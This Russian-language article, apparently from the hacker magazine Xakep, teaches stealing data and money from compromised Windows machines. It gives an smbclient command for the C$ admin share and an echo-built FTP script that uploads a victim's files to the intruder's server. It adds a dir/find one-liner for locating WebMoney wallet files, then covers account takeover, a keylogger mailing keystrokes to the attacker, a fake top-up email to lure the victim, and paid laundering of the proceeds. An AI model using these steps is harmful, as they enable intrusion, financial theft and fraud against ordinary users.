Воровство в Сети

Докучаев Дмитрий aka Forb

Спецвыпуск Xakep, номер #036, стр. 036-076-2

smbclient //IP-ADDRESS/$C -U admin

Эта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).

Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.

Кто ищет, тот всегда найдет

В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file". Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:

Таблица: пример FTP-сценария

user vasya vasya123

type binary

put document.doc /xakep/document.doc

quit

После составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.

Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:

dir /S c:\ | find *.?wm

При этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.

WebMoney - радость хакера

После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.

Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса - отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.